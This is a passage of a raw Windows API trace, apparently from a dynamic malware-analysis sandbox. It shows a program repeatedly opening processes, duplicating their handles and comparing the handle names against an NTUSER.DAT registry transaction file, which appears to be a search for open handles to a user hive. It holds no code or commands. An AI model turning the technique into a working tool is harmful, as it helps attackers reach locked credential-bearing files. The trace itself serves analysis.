dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.522] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.522] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.522] CloseHandle (hObject=0x670) returned 1 [0153.523] _wcsicmp (_Str1="\\LSM_API_service", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -2 [0153.523] CloseHandle (hObject=0x680) returned 1 [0153.523] CloseHandle (hObject=0x62c) returned 1 [0153.523] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x62c [0153.523] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.523] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.524] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.524] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.524] CloseHandle (hObject=0x670) returned 1 [0153.524] _wcsicmp (_Str1="\\LSM_API_service", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -2 [0153.524] CloseHandle (hObject=0x680) returned 1 [0153.525] CloseHandle (hObject=0x62c) returned 1 [0153.525] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x62c [0153.525] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x21c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.525] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.525] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.526] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.526] CloseHandle (hObject=0x670) returned 1 [0153.526] _wcsicmp (_Str1="\\lsm.exe.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -2 [0153.526] CloseHandle (hObject=0x680) returned 1 [0153.526] CloseHandle (hObject=0x62c) returned 1 [0153.526] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x62c [0153.526] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.526] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.527] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.528] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.528] CloseHandle (hObject=0x670) returned 1 [0153.528] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.528] CloseHandle (hObject=0x680) returned 1 [0153.528] CloseHandle (hObject=0x62c) returned 1 [0153.528] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x62c [0153.528] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x6c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.528] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.529] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.529] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.529] CloseHandle (hObject=0x670) returned 1 [0153.529] CloseHandle (hObject=0x680) returned 1 [0153.530] CloseHandle (hObject=0x62c) returned 1 [0153.530] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x62c [0153.530] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x280, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.530] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.530] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.532] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.532] CloseHandle (hObject=0x670) returned 1 [0153.532] _wcsicmp (_Str1="\\plugplay", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 2 [0153.532] CloseHandle (hObject=0x680) returned 1 [0153.532] CloseHandle (hObject=0x62c) returned 1 [0153.532] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x62c [0153.532] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x284, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.532] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.533] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.533] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.533] CloseHandle (hObject=0x670) returned 1 [0153.533] _wcsicmp (_Str1="\\plugplay", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 2 [0153.533] CloseHandle (hObject=0x680) returned 1 [0153.533] CloseHandle (hObject=0x62c) returned 1 [0153.534] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x62c [0153.534] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x288, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.534] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.534] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.535] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.535] CloseHandle (hObject=0x670) returned 1 [0153.535] _wcsicmp (_Str1="\\plugplay", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 2 [0153.535] CloseHandle (hObject=0x680) returned 1 [0153.535] CloseHandle (hObject=0x62c) returned 1 [0153.535] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x62c [0153.535] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x370, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.535] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.536] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.536] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.536] CloseHandle (hObject=0x670) returned 1 [0153.536] CloseHandle (hObject=0x680) returned 1 [0153.536] CloseHandle (hObject=0x62c) returned 1 [0153.536] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x62c [0153.536] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.537] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.537] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.538] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.538] CloseHandle (hObject=0x670) returned 1 [0153.538] _wcsicmp (_Str1="\\umpnpmgr.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 7 [0153.538] CloseHandle (hObject=0x680) returned 1 [0153.538] CloseHandle (hObject=0x62c) returned 1 [0153.538] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0153.538] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.538] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.539] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.539] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.539] CloseHandle (hObject=0x670) returned 1 [0153.540] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.540] CloseHandle (hObject=0x680) returned 1 [0153.540] CloseHandle (hObject=0x62c) returned 1 [0153.540] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0153.540] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x84, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.540] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.540] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.541] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.541] CloseHandle (hObject=0x670) returned 1 [0153.541] CloseHandle (hObject=0x680) returned 1 [0153.541] CloseHandle (hObject=0x62c) returned 1 [0153.541] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0153.541] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x15c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.541] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.542] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.543] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.543] CloseHandle (hObject=0x670) returned 1 [0153.543] CloseHandle (hObject=0x680) returned 1 [0153.543] CloseHandle (hObject=0x62c) returned 1 [0153.543] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0153.543] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x164, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.543] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.544] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.544] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.544] CloseHandle (hObject=0x670) returned 1 [0153.544] CloseHandle (hObject=0x680) returned 1 [0153.544] CloseHandle (hObject=0x62c) returned 1 [0153.544] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0153.544] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x168, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.544] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.545] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.546] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.546] CloseHandle (hObject=0x670) returned 1 [0153.546] CloseHandle (hObject=0x680) returned 1 [0153.546] CloseHandle (hObject=0x62c) returned 1 [0153.546] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0153.546] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x170, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.546] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.547] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.547] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.547] CloseHandle (hObject=0x670) returned 1 [0153.547] _wcsicmp (_Str1="\\CatalogChangeListener-294-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -11 [0153.548] CloseHandle (hObject=0x680) returned 1 [0153.548] CloseHandle (hObject=0x62c) returned 1 [0153.548] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0153.548] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x174, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.548] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.548] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.550] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.550] CloseHandle (hObject=0x670) returned 1 [0153.550] CloseHandle (hObject=0x680) returned 1 [0153.550] CloseHandle (hObject=0x62c) returned 1 [0153.550] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0153.550] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x17c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.550] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.551] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.552] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.552] CloseHandle (hObject=0x670) returned 1 [0153.552] CloseHandle (hObject=0x680) returned 1 [0153.552] CloseHandle (hObject=0x62c) returned 1 [0153.552] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0153.552] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x180, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.552] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.553] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.553] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.554] CloseHandle (hObject=0x670) returned 1 [0153.554] CloseHandle (hObject=0x680) returned 1 [0153.554] CloseHandle (hObject=0x62c) returned 1 [0153.554] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0153.554] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x184, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.554] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.554] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.555] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.555] CloseHandle (hObject=0x670) returned 1 [0153.555] CloseHandle (hObject=0x680) returned 1 [0153.555] CloseHandle (hObject=0x62c) returned 1 [0153.555] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0153.555] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.555] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.556] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.557] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.557] CloseHandle (hObject=0x670) returned 1 [0153.557] CloseHandle (hObject=0x680) returned 1 [0153.557] CloseHandle (hObject=0x62c) returned 1 [0153.557] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0153.557] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.557] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.558] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.558] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.558] CloseHandle (hObject=0x670) returned 1 [0153.558] CloseHandle (hObject=0x680) returned 1 [0153.559] CloseHandle (hObject=0x62c) returned 1 [0153.559] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0153.559] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.559] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.559] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.560] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.560] CloseHandle (hObject=0x670) returned 1 [0153.560] _wcsicmp (_Str1="\\epmapper", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -9 [0153.560] CloseHandle (hObject=0x680) returned 1 [0153.560] CloseHandle (hObject=0x62c) returned 1 [0153.560] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0153.560] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.560] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.561] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.562] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.562] CloseHandle (hObject=0x670) returned 1 [0153.562] _wcsicmp (_Str1="\\epmapper", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -9 [0153.562] CloseHandle (hObject=0x680) returned 1 [0153.562] CloseHandle (hObject=0x62c) returned 1 [0153.562] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0153.562] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.562] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.563] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.564] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.564] CloseHandle (hObject=0x670) returned 1 [0153.564] _wcsicmp (_Str1="\\epmapper", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -9 [0153.564] CloseHandle (hObject=0x680) returned 1 [0153.564] CloseHandle (hObject=0x62c) returned 1 [0153.564] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.564] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.564] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.565] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.566] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.566] CloseHandle (hObject=0x670) returned 1 [0153.566] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.566] CloseHandle (hObject=0x680) returned 1 [0153.566] CloseHandle (hObject=0x62c) returned 1 [0153.566] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.566] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.566] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.567] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.568] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.568] CloseHandle (hObject=0x670) returned 1 [0153.568] CloseHandle (hObject=0x680) returned 1 [0153.568] CloseHandle (hObject=0x62c) returned 1 [0153.568] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.568] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x124, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.568] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.569] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 